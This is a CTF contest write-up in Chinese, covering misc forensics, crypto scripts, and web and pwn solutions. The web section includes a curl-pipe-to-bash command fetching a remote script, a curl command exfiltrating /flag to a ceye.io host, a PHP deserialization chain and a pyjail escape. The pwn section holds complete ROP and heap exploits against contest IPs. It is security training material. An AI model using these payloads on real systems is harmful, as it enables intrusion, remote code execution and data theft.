贵阳大数据及网络安全精英对抗赛WP

警告
本文最后更新于 2023-05-02,文中内容可能已过时。
RANK
RANK:65

(LFI没交上就下了)

misc

传说中的小黑

打开jpg,

文件尾有个base64和zip

image-20230427105811623

b64解得

flag{key=FFD8FFE0}

然后解压压缩包

flag 文件补上 JPEG 文件头 FFD8FFE0(上一步 key 给出的正是 JPEG 的魔数)

image-20230427202737194

是二维码,扫码即可

wordexcelppt

docx作为压缩包解压

在errors.xml里有段base64

解码是二维码png,扫码得到flag

time

江苏工匠杯,时间刺客同款考点

import os
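def char_from_mtime(mtime: float) -> str:
    """Decode one flag character hidden in a file's modification time.

    The challenge plants the character code in the fractional digits of the
    mtime: ``str(mtime)[-5:-2]`` takes three digits from the float's text form
    and interprets them as a code point. This depends on the exact ``str``
    representation of the float, so it only works for mtimes shaped like the
    planted ones (a "round" timestamp such as ``1.5`` raises ``ValueError``).
    """
    return chr(int(str(mtime)[-5:-2]))


def recover_flag(count: int = 38, template: str = "change{}.txt", mtime_of=os.path.getmtime) -> str:
    """Concatenate the character hidden in ``template.format(i)`` for ``i`` in ``range(count)``.

    ``mtime_of`` reads a file's modification time (default ``os.path.getmtime``);
    it is injectable so the decoding can be exercised without real files.
    """
    return "".join(char_from_mtime(mtime_of(template.format(i))) for i in range(count))


if __name__ == "__main__":
    print(recover_flag())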

图片的秘密

docx作为压缩包解压

得到pass.txt和png

http://www.jsons.cn/imghideinfo

网站解

image-20230428122903103

easymisc

change19的gif不一样

在14帧,扫码得到

https://pan.baidu.com/s/1D-XdJvkKWbVFoRx_AEZZzw?pwd=v6p6 
提取码:v6p6

然后下载game.tar

在\a12553183e6feaa32744e405985000f41591bdff85f9d81967a6405196e3a71a发现gif

拼二维码得到flag

image-20230428123053849

cb0x-new

/* Drop-in replacement main(): spawn an interactive shell instead of the
   challenge's logic. `void main` is non-standard C but is what the writeup
   used; the flag is then read from /home/ctf/main.c. */
void main()
{
	system("/bin/bash");
}

构造交互式回显

flag在/home/ctf/main.c中

image-20230428152129080

j@il-new

https://github.com/m1dm4n/CTF-WriteUp/blob/3e14d18186726847db7cbd7a37d567e7f9ecf474/2023/angstrom2023/obligatory/solve.py

angstromCTF2023原题

# Pyjail escape: the walrus rebinds __builtins__ to the os module, so the bare
# name `system` inside the lambda (created afterwards) is resolved through os.
(__builtins__:=__import__('os'))and(lambda:system)()('sh')

qrsea (复现)

531张二维码,读图片分辨率

一共10种尺寸,把不同尺寸排序后依次当作0-9(下面脚本用 sorted 升序排列,即最小尺寸对应 0)

然后组成数字

画tupper自指图像

from PIL import Image
from collections import Counter

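def digits_from_sizes(sizes) -> str:
    """Map every size to its rank among the distinct sizes (ascending) and join the ranks.

    Equivalent to ``sorted(Counter(sizes)).index(s)`` for each ``s`` (the rank
    lookup is precomputed once instead of a linear search per image). The
    smallest size becomes "0"; with ten distinct sizes the result is a decimal
    digit string.
    """
    rank = {size: idx for idx, size in enumerate(sorted(set(sizes)))}
    return "".join(str(rank[size]) for size in sizes)


def image_heights(names) -> list:
    """Return the pixel height of each image in ``names``, closing each file after reading."""
    heights = []
    for name in names:
        with Image.open(name) as img:
            heights.append(img.height)
    return heights


if __name__ == "__main__":
    # 531 QR images named 0.png .. 530.png; only their height matters.
    img_list = [f"{i}.png" for i in range(531)]
    sizes = image_heights(img_list)
    flag = digits_from_sizes(sizes)
    print(flag)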
# ================= 画图 ======================

import numpy as np
import matplotlib.pyplot as plt


def Tupper_self_referential_formula(k):
    """Render the 106x17 bitmap that Tupper's formula encodes for integer ``k``.

    Pixel (x, y), x in 0..105, y in 0..16, is set iff
    floor((y + k) / 17) / 2^(17*x + (y + k) mod 17) is odd, i.e. bit
    ``17*x + (y + k) % 17`` of ``(y + k) // 17`` is 1. Python ints keep the
    shift exact for the huge ``k`` the puzzle produces. The column order is
    reversed before returning so the picture reads left to right on screen.
    """
    bitmap = np.zeros((17, 106))
    for row in range(17):
        quotient, remainder = divmod(row + k, 17)
        for col in range(106):
            bitmap[row, col] = (quotient >> (17 * col + remainder)) & 1
    return bitmap[:, ::-1]


# Interpret the digit string as Tupper's k and draw the bitmap it encodes.
k = int(flag)
aa = Tupper_self_referential_formula(k)
plt.figure(figsize=(15, 10))
axes = plt.gca()
axes.imshow(aa, origin='lower')
axes.invert_xaxis()
plt.show()

crypto

math

一个PoW

import itertools
import string
import hashlib

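def s256(str: str) -> str:
    """Hex SHA-256 digest of a text string (UTF-8 encoded).

    The parameter keeps its original name ``str`` for compatibility even
    though it shadows the builtin inside the function body.
    """
    return hashlib.sha256(str.encode()).hexdigest()


def PoW(str1: str, hash: str, length: int = 4) -> "str | None":
    """Brute-force the alphanumeric prefix ``x`` with sha256(x + str1) == hash.

    Candidates are tried in ``itertools.product`` order over
    ``ascii_letters + digits``. On success the prefix is printed (as the
    original did) and also returned; ``None`` is returned when no
    ``length``-character prefix matches. ``hash`` is a lowercase hex digest;
    the name mirrors the original signature.
    """
    charset = string.ascii_letters + string.digits
    for candidate in itertools.product(charset, repeat=length):
        prefix = "".join(candidate)
        if s256(prefix + str1) == hash:
            print(prefix)
            return prefix
    return None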

另一个解方程

# sage
#p,q = var('p q')
#solve([(p**9)+(q**9)==2824822169624626054661488626925458420744715781080646942074253083493110409304139573698331220638806746185475842194119961243645804370254606328869920018072689414438851986763034645626556982418990163940800474549193470898195538208390077574728861492183878546810890489530709875694439708304188836872775133284206949916525601873082688977829638863138990316027434787047769932507784217745872371234159638863412009751336370516261263894787945468938670587885217215533551430379370918887017578135901512047635699889591590644728268209911213837545954673959103136577695532350503753325666353616999846273454813736702876968828262577312436890164868139215146941181825104314265142027185641195497429436701158821466597436322426101818844710031297488336024894303790150460476458932731090576824660354020881969224935848618388008509287249786048287099709905361669995934683044400119527112547308946141798312531702089592589519108535371095268166661526029944144811749355534331341058531140340843830280132820250819782775604064279338833095450886869781021370514423225666663969097910935332887127861068226704314810075641777615479058315604743490070494698514916318640565210625873112244649996112730726083223048152494260522865824835075057025248755461487069699219010214934196309822790800505679440651281428272245964425847552725070324370935048163205674057942566606069023173193117188785459966877961255640155226356782264373613291491124970651673222,(p**3)+(q**3)==2170975452570130427181048521695873973135933481372313804498232310176782170227124595928130478815483294370924323759914604172695746976894120890757779825855362817255229290661676271054758017616180660951572648811631474401996380573736869074007533444837272191850638568203334900550339868176862783180156627459202829081595794230688694799962290853974633400675886602057846186352130394606371882689934371132063210289099864922945499792531454940004181032574377548535600071749073142],p,q)


# Roots recovered by the commented-out Sage solve() above; the challenge asks
# for (p*q) mod (p+q).
p = 9594047826943378377351189875982059550378092961629981934201818330211249023837891624869663520671840878621229056198869324834898357120275293602972034861979531

q = 10879917259777350236190881969122866735740638588895721372296776744093023576036252166941469241893414961612291902305518369155724747612316672092990811722587451

_, answer = divmod(p * q, p + q)
print(answer)

image-20230427171426198

线性代数

# Sage script. Four 11x11 matrices over GF(71) copied from the challenge:
# E is presumably the ciphertext matrix, A/B/C the public values used below to
# rebuild the masking matrix R.
E=[[48,11,39,15,22,11,52,59,39,11,61],
[16,56,43,35,36,48,40,9,19,50,65],
[10,48,40,29,70,29,12,33,36,27,67],
[57,38,26,61,64,70,37,45,70,1,39],
[58,44,20,58,26,42,31,33,10,28,69],
[26,55,27,57,69,45,52,62,55,6,24],
[45,10,4,65,16,60,54,45,25,22,32],
[33,20,15,12,25,56,15,70,44,25,69],
[30,62,23,9,45,15,70,0,20,20,15],
[24,1,41,24,70,70,42,59,18,0,29],
[0,2,23,17,67,52,57,68,58,65,46],]

A = [[29,60,16,59,40,4,34,57,1,55,67],
[9,1,44,67,5,20,30,6,42,66,25],
[44,1,24,69,24,23,3,43,42,20,52],
[47,63,2,7,50,35,11,22,59,35,0],
[19,7,36,59,64,2,50,47,30,7,31],
[19,24,48,2,32,41,60,43,50,60,32],
[31,11,62,11,68,27,57,4,66,38,46],
[25,30,63,52,36,65,61,25,22,4,64],
[38,35,39,2,43,39,67,57,19,26,21],
[14,25,14,40,30,52,70,45,70,5,55],
[10,6,18,32,3,20,23,52,25,45,27],]

B = [[25,14,12,18,22,12,0,68,21,57,61],
[34,23,10,47,25,26,61,26,70,6,20],
[31,28,23,42,63,21,19,16,21,20,14],
[27,48,28,17,1,64,30,49,4,62,48],
[51,67,8,28,8,6,5,5,19,27,5],
[25,30,48,41,8,55,10,18,61,38,35],
[8,45,69,64,55,33,15,21,3,41,59],
[53,15,56,53,14,3,52,0,15,40,48],
[31,63,42,18,37,56,32,5,70,11,15],
[56,15,3,46,5,68,24,70,64,27,25],
[44,69,65,13,70,17,16,30,39,56,62],]

C = [[64,53,46,34,58,23,63,8,58,17,34],
[9,29,67,42,10,35,16,53,29,55,53],
[46,20,7,56,47,20,61,38,11,37,67],
[54,0,53,26,38,46,62,18,9,33,57],
[54,44,59,53,18,40,58,56,38,40,45],
[37,24,10,29,41,5,58,24,20,46,49],
[19,63,18,7,37,46,41,62,58,59,21],
[60,45,44,12,21,9,63,67,50,31,18],
[36,68,19,1,0,61,34,49,21,11,58],
[5,35,26,32,36,41,35,12,5,25,27],
[51,42,69,16,28,28,5,8,42,26,19],]

# 71 symbols, one per element of GF(71): a matrix entry is decoded as alphabet[entry].
alphabet = '=0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ$!?_{}<>'
p = 71
E, A, B, C = [matrix(GF(p), _) for _ in [E, A, B, C]]
# Note: in Sage `^` is exponentiation (it would be XOR in plain Python).
# U = B*A^-1, S2 = A*U = A*B*A^-1, R = (C*S2^-4)^-1, M = U^-1*(E - U*R).
# These invert the challenge's construction (not reproduced here); M is the
# plaintext matrix.
U = B * (A^-1)
S2 = A*U
R = (C*S2^(-4))^-1
M = U^-1*(E-U*R)

# The 24 flag characters sit at row-major positions 0, 5, 10, ... (stride 5)
# of the 11x11 matrix M; (5k // 11, 5k % 11) is that position's (row, col).
print("flag{",end='')
for k in range(24):
    i, j = 5*k // 11, 5*k % 11
    print(alphabet[int(M[i, j])],end='')

print("}")

eezzrrssaa

# sage

# Sage script (the `R.<a, b> = ...` generator syntax is Sage, not Python).
# ps (leaked primes), q (LCG modulus) and t (step counts) come from the
# recovery script further down the page.
pr1, pr2 = list(), list()
for i in ps:
    # Each prime was built as hi*q + lo (see get_prime below): hi is an output
    # of the second generator, lo an output of the first.
    pr2 += [int(i//q)]
    pr1 += [int(i%q)]
# Known parameters of the first generator (unused here; kept from the recovery script).
a1, b1 = 202320232023, 320232023202

# Unknown parameters a, b of the second generator. Advancing pr2[i] by the
# known t[i] steps must reach pr2[i+1]; each relation is a polynomial in a, b
# over GF(q), and the Groebner basis of the ideal they generate pins a and b
# down (the printed basis gives a2, b2).
B = list()
R.<a, b> = PolynomialRing(GF(q))
for i in range(len(pr2)-1):
    now = pr2[i]
    for j in range(t[i]):
        now = a*now+b
    B.append(now - pr2[i+1])
B = Ideal(B).groebner_basis()
for i in B:
	print(i)

求出a2 b2

lcg恢复

from Crypto.Util.number import *

# Challenge constants. q is the modulus of both linear congruential generators
# and the radix used to combine their outputs into a prime (see get_prime).
q = 863666614243448299685073534539782091614466038667659466359664255833879357401208752356758391473753149783695523347
# The four primes leaked by the challenge, each of the form hi*q + lo.
ps = [488430779430824599064935338391249442829022539899115535143196485163487049206340136142789020350176476554441378462595965038290365842362034176672340569719593003574222248527447206361459719954322885881075726676950555671635007363, 707157149197462658139117084378634522562212403870035237598970809858394732217372944239689355077884840011520921058759306333833289658731807522052892377679354636501446734633867023331470805974187027036109531714774435994689042891, 476172773176400166870512700278283739900716339392176146031791100542596627419155254113738721222559386964568077259931246639803960023216418997484355347182274626554844693011339867671881591249587444088969603398209425951467440211, 479577456885290037281759580853233626951314430312455485422558946021203602708559915552877926123425413442096439066002524196474514162220000152373758925097140843218665566655451970747063255562540421337155353658793225970423042099]
# RSA modulus and ciphertext (public exponent 0x10001, see the decryption step).
n = 98507292107212647629392277192521724876575060525397166586602724341772322834661685719879043139101436908036967520130509456130010632959287915661915441539615555345261656834100254232656609022587219863738542204349757544278313022268849986380405350778976502504598388632375506019980481343421510001650112826277323670706717869878490374078543128198589764240329950804782453481144228576858436696625100959717702337809834581369797601972108713612318371100605389
c = 57773774305129316009141892175661507569534831447382854914588401185097291538023184369651537398951570363918970263297625149448254614479110835192103043721312687685309489008584881189077640538284919592229456061921760452134520765924458040140450750863491592935761079322474155890093610865852109521471075002695928101302724254321097314555582345987979625286958861654447780330651520542323214097640450289283886871665487690407096815701340627706657525543320274

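class PRNG:
    """Linear congruential generator: x -> (a*x + b) mod modulus.

    ``modulus`` defaults to the module-level ``q`` (the challenge's LCG
    modulus), which is looked up at call time exactly as the original did.
    Pass it explicitly to decouple the generator from that global: because the
    lookup is dynamic, rebinding ``q`` later in the script silently changes
    the modulus of every generator created without one.
    """

    def __init__(self, a, x, b, modulus=None):
        self.a = a        # multiplier
        self.x = x        # current state; next() returns it before advancing
        self.b = b        # increment
        self.modulus = modulus

    def next(self):
        """Return the current state, then advance to the next one."""
        ret = self.x
        m = self.modulus if self.modulus is not None else q
        self.x = (self.a * self.x + self.b) % m
        return ret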


def get_prime(prng1,prng2,q):
    """Draw hi from ``prng2`` and lo from ``prng1`` until hi*q + lo is prime; return it.

    Every candidate consumes exactly one output of each generator, which is
    what makes the step counts between leaked primes recoverable.
    """
    while True:
        hi = prng2.next()
        lo = prng1.next()
        candidate = hi * q + lo
        if isPrime(candidate):
            return candidate

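def lcg_steps(start, target, a, b, m):
    """Number of x -> (a*x + b) mod m steps needed to reach ``target`` from ``start``.

    The sequence lives among the m residues mod m, so a target not reached
    within m steps is unreachable; raise ``ValueError`` in that case instead
    of spinning forever (the original loop had no exit on inconsistent input).
    """
    state, steps = start, 0
    while state != target:
        if steps >= m:
            raise ValueError("target state is not reachable from start")
        state = (a * state + b) % m
        steps += 1
    return steps


# Split each leaked prime p = hi*q + lo (see get_prime) back into the two
# generator outputs: pr2 holds the high halves (PRNG 2), pr1 the low halves (PRNG 1).
pr1, pr2 = list(), list()
for prime in ps:
    pr2.append(int(prime // q))
    pr1.append(int(prime % q))
# Known parameters of the first generator.
a1, b1 = 202320232023, 320232023202

# Each prime candidate consumes one output of each generator, so the number of
# PRNG-1 steps between consecutive low halves is also the number of PRNG-2
# steps between the matching high halves (consumed by the Groebner script above).
t = [lcg_steps(cur, nxt, a1, b1, q) for cur, nxt in zip(pr1, pr1[1:])]
print(t)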


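# Parameters of the second generator, recovered by the Groebner-basis script
# above (its output is negative, hence the reduction mod q).
a2 = -721474313686950040760456718395855289332361081440581115357964297160374075412604063880198191814907640385556239775 % q
b2 = -42522514490869169124681320640539356074221591805568832332992800925663834398026485545017374651679305179842368739 % q

# Resume both generators from the halves of the last leaked prime and produce
# the next candidates; one of them is expected to divide n.
prng1 = PRNG(a1,pr1[-1],b1)
prng2 = PRNG(a2,pr2[-1],b2)
ps = [get_prime(prng1,prng2,q) for _ in range(3)]
for p in ps:
    if n % p:
        continue
    # Do not rebind ``q`` here: it is the LCG modulus that PRNG.next reads
    # dynamically (the original clobbered it with the RSA cofactor).
    other = n // p
    phi = (p - 1) * (other - 1)   # == n - p - other + 1
    d = inverse(0x10001, phi)
    print(long_to_bytes(int(pow(c, d, n))))
    break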

web

仔细ping

?ip=nl flag.php

May_be

无参rce

/?exp=system('curl https://blog.shenghuo2.top/shE1l.html|bash');&a=eval(pos(pos(get_defined_vars())));

命令执行弹个shell

flag 文件权限是 700,当前用户没有读权限

suid提权

image-20230427195019698

cp 带有 SUID 位,可以用它把 flag 复制成当前用户可读的文件

https://blog.csdn.net/CP1024/article/details/123952966

suid提权

image-20230427195346124

pop

<?php
// Challenge source; highlight_file() shows it verbatim to the player.
highlight_file(__FILE__);
class TT{
    public $key;
    public $c;
    // Chain entry: when a TT is destroyed, echo converts $key to a string, so
    // a JJ instance stored in $key reaches JJ::__toString().
    public function __destruct(){
        echo $this->key;
    }

    // Not needed by the chain.
    public function __toString(){
        return "welcome";
    }
}

class JJ{
    public $obj;
    // Calling $obj as a function invokes MM::__invoke() when $obj is an MM.
    public function __toString(){
        ($this -> obj)();
        return "1";
    }
    // Sink: evaluates attacker-controlled PHP. Reached via the callable
    // string 'JJ::evil' that MM::__invoke() calls with $c.
    public function evil($c){
        eval($c);
    }
    // Decoy: __sleep() runs on serialize(), never on unserialize().
    public function __sleep(){
        phpinfo();
    }
}

class MM{
    public $name;
    public $c;
    // Both the callee and its argument come from the serialized object, so
    // this is a "call any callable with one argument" primitive.
    public function __invoke(){
        ($this->name)($this->c);
    }
    // Decoys: not used by the working chain.
    public function __toString(){
        return "ok,but wrong";
    }
    public function __call($a, $b){
        echo "Hacker!";
    }
}
// Sink of user input: unserialize() on a GET parameter instantiates
// attacker-chosen classes. The Error thrown right afterwards is intended to
// keep $a's destructor from running at shutdown, so the chain has to fire
// while unserialize() is still executing (see the duplicate-key payload below).
$a = unserialize($_GET['bbb']);
throw new Error("NoNoNo");

链子

<?php

// Stub mirror of the challenge class: only the public property names (and
// their declaration order) matter for serialize().
class TT{
    public $key;
    public $c;
}

// Stub mirror of the challenge class; $obj will hold the MM instance.
class JJ{
    public $obj;
}

class MM{
    // Callable string and argument consumed by MM::__invoke(): it ends up
    // calling JJ::evil('system("ls /");'). NOTE(review): calling the
    // non-static JJ::evil statically throws an Error on PHP 8, so this
    // relies on the target running PHP 7.
    public $name = 'JJ::evil';
    public $c = 'system("ls /");';
}
// Build TT -> JJ -> MM and wrap it in a two-element array. The serialized
// output is then edited so both elements use key i:0 (see below): the
// duplicate key makes unserialize() release the TT object — running its
// __destruct() — before the challenge's throw is reached.
$a = new TT();
$a ->key = new JJ();
$a ->key ->obj = new MM();
$b=array($a,0);
echo serialize($b);

利用 GC 提前回收:把数组第二个元素的键 i:1 改成 i:0,反序列化时重复的键会覆盖前一个元素,TT 对象在 unserialize() 过程中就被释放,__destruct 在后面的 throw new Error 之前触发

?bbb=a:2:{i:0;O:2:"TT":2:{s:3:"key";O:2:"JJ":1:{s:3:"obj";O:2:"MM":2:{s:4:"name";s:8:"JJ::evil";s:1:"c";s:15:"system("ls /");";}}s:1:"c";N;}i:0;i:0;}

JUST_PROTO

js原型链污染

先set,存进redis缓存

http://39.106.143.69:28629/set?token=__proto__&key=redis_set&val=curl%20http://`base64%20/flag`.uoi23u.ceye.io/

然后发PUT包触发/bkup

PUT /bkup HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,ja;q=0.6

image-20230428172626704

curl外带

notrce

过滤很多,但是还是剩下点

nl /flag | tee 1.txt

读1.txt

完美网站

解码那个重定向的base64

得到tupian.png

下载,文件尾得到ffffpq.php

image-20230428123643488

base编码index.php

读源码

<?php
header("Content-type:text/html;charset=utf-8");


// Hint to the player: n is a small number (2..20).
echo "别重定向了,赶快让我(?n=30-10,以内的数值。)-_-";
// Untrusted: the file name comes straight from the query string (base64-encoded).
$image=$_GET['img'];

// Fresh random pick from 2..20 (19 values, PHP range() is inclusive) on every
// request, so a guessed n matches with probability 1/19 — brute-forceable.
$allow = range(2,20);
shuffle($allow);

if(($_GET['n']==$allow[0])){
	// Arbitrary file read: the decoded name reaches file_get_contents() with no
	// allow-list or path restriction, and the content is reflected back
	// base64-encoded inside the data: URI (this is how index.php's source leaks).
	$image = base64_decode($image);
	$data = base64_encode(file_get_contents($image));
	echo "<img src='data:image/png;base64,$data'/>";
}else{
	// Wrong guess: redirect to the benign image.
	$image = base64_encode("tupian.png");
	header("location:/?img=".$image);
}

每次请求都会重新 shuffle,所以 n 只有 1/19 的概率猜中,直接爆破即可

GET /?n=6&img=ZmZmZnBxLnBocA==

爆破n即可

image-20230428184146589

it’s time

ssti,用fenjing梭

image-20230428151700666

image-20230428151716453

在根目录

cat /f1ag_g4lfcdecddefewfebge

image-20230428151756246

pwn

easystack

from pwn import *
context.log_level='debug'

# p=process("./pwn2")
# Hard-coded contest instance; use the process() line above to run locally.
p=remote('39.107.27.191',2960)

elf=ELF("./pwn2")
libc=ELF("./libc.so.6")
# Short aliases over the pwntools tube API used by the exploit below.
r = lambda : p.recv()
rx = lambda x: p.recv(x)
ru = lambda x: p.recvuntil(x)
rud = lambda x: p.recvuntil(x, drop=True)
s = lambda x: p.send(x)
sl = lambda x: p.sendline(x)
sa = lambda x, y: p.sendafter(x, y)
sla = lambda x, y: p.sendlineafter(x, y)
close = lambda : p.close()
debug = lambda : gdb.attach(p)
shell = lambda : p.interactive()

# Fixed addresses read from ./pwn2 (consistent with a non-PIE binary): puts@plt
# and a `pop rdi; ret` gadget for the x86-64 calling convention.
puts_plt=0x401090
pop_rdi=0x401363
puts_got=elf.got['puts']
main_addr = elf.sym['main']
ru(b": \n")
# Canary leak: 40 bytes fill the buffer and the 41st 'a' overwrites the
# canary's low NUL byte, so the program's echo keeps printing past the buffer.
s(b"a"*41)
ru(b"output: \n")
ru(b"a"*40)
# Take the leaked bytes up to the next NUL and undo the 0x61 ('a') written over
# the low byte. NOTE(review): u64 needs exactly 8 bytes, so this relies on the
# echo stopping right after the canary — confirm on the target.
can=u64(rud('\x00'))-0x61
ru(b": \n")
# Stage 1 ROP: pad | canary | saved rbp | pop rdi; puts@got | puts@plt | main
# -> leaks puts' libc address, then returns to main for a second overflow.
pl1=b'a'*40+p64(can)+b'a'*8+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main_addr)
s(pl1)
libc_addr = u64(ru(b"\x7f")[-6:].ljust(8, b"\x00"))-libc.sym['puts']
system=libc.sym['system']+libc_addr

# Hard-coded offset of "/bin/sh" in the supplied libc.so.6.
# NOTE(review): next(libc.search(b"/bin/sh\x00")) derives it from the file and
# avoids a silently wrong offset if the libc changes.
bin_sh=0x1b45bd+libc_addr
# Stage 2: same canary/rbp padding, then a single `ret` (0x40101a, presumably
# to keep the stack 16-byte aligned for system) | pop rdi; "/bin/sh" | system.
pl2=b'a'*40+p64(can)+b'a'*8+p64(0x40101a)+p64(pop_rdi)+p64(bin_sh)+p64(system)
ru(b"input: \n")
s(b"1")
ru(b"input: \n")
sl(pl2)

shell()

easynote

from pwn import *
# p = process('./pwn1')
# Hard-coded contest instance; use the process() line above to run locally.
p = remote('123.56.175.221',21819)
libc = ELF('./libc.so.6')

# Short aliases over the pwntools tube API used by the menu helpers below.
r = lambda : p.recv()
rx = lambda x: p.recv(x)
ru = lambda x: p.recvuntil(x)
rud = lambda x: p.recvuntil(x, drop=True)
s = lambda x: p.send(x)
sl = lambda x: p.sendline(x)
sa = lambda x, y: p.sendafter(x, y)
sla = lambda x, y: p.sendlineafter(x, y)
close = lambda : p.close()
debug = lambda : gdb.attach(p)
shell = lambda : p.interactive()

def add(size, data):
    """Menu option 1: allocate a note of ``size`` bytes and write ``data`` into it."""
    p.sendlineafter(b"choice: ", b"1")
    p.sendlineafter(b"size: ", str(size))
    p.sendafter(b"data: ", data)

def dele():
    """Menu option 2: free the note (the program keeps a single note, no index)."""
    p.sendlineafter(b"choice: ", b"2")

def show():
    """Menu option 3: print the note's contents (used for the libc leak)."""
    p.sendlineafter(b"choice: ", b"3")

def edit(data):
    """Menu option 4: overwrite the note's contents with ``data`` (works on freed notes too)."""
    p.sendlineafter(b"choice: ", b"4")
    p.sendafter(b"Data: ", data)

def clear():
    """Push 0x1000 bytes of '1' through the menu prompt (input reset between steps)."""
    p.sendlineafter(b"choice: ", b"1" * 0x1000)


# One note of 0x18 bytes (0x20 chunk). Each round zeroes the first 16 bytes of
# the note (where tcache keeps `next` and `key`) before freeing it again, so
# the same chunk is freed 8 times without tripping the tcache double-free
# check. NOTE(review): presumably the 8th free spills past the 7-entry tcache
# into the fastbin — confirm against the target glibc.
add(0x18, b'a' * 0x18)
for i in range(8):
    edit(b'\x00' * 16)
    dele()

add(0x28, b'a' * 0x28)
# clear() pushes 0x1000 bytes through the menu; its effect on program state is
# not visible from this script (presumably an input reset).
clear()
# Low-byte overwrite of a freed chunk's forward pointer, then show() prints
# from it; the output is parsed as a 6-byte little-endian libc pointer.
add(0x18, b'\xf0')
show()

# libc base from the leak. "-112-16" is the distance between the leaked
# pointer and __malloc_hook in this libc build — glibc-version specific, so
# re-derive it if libc.so.6 changes.
libc.address = u64(ru(b'\x7f')[-6:].ljust(8, b'\x00')) - 112 - 16 - libc.sym['__malloc_hook']
clear()
# tcache poisoning: free the 0x30 chunk twice (zeroing `key` in between), write
# __free_hook into its `next` pointer, then two same-size allocations hand
# back first the chunk and then __free_hook itself.
add(0x28, b'a' * 0x28)
dele()
edit(b'\x00' * 16)
dele()
edit(p64(libc.sym['__free_hook']))
clear()
add(0x28, p64(libc.sym['__free_hook']))
clear()
# This allocation is __free_hook: overwrite it with system.
add(0x28, p64(libc.sym['system']))
clear()
# free("/bin/sh") now calls system("/bin/sh").
add(0x28, b'/bin/sh\x00')
dele()


shell()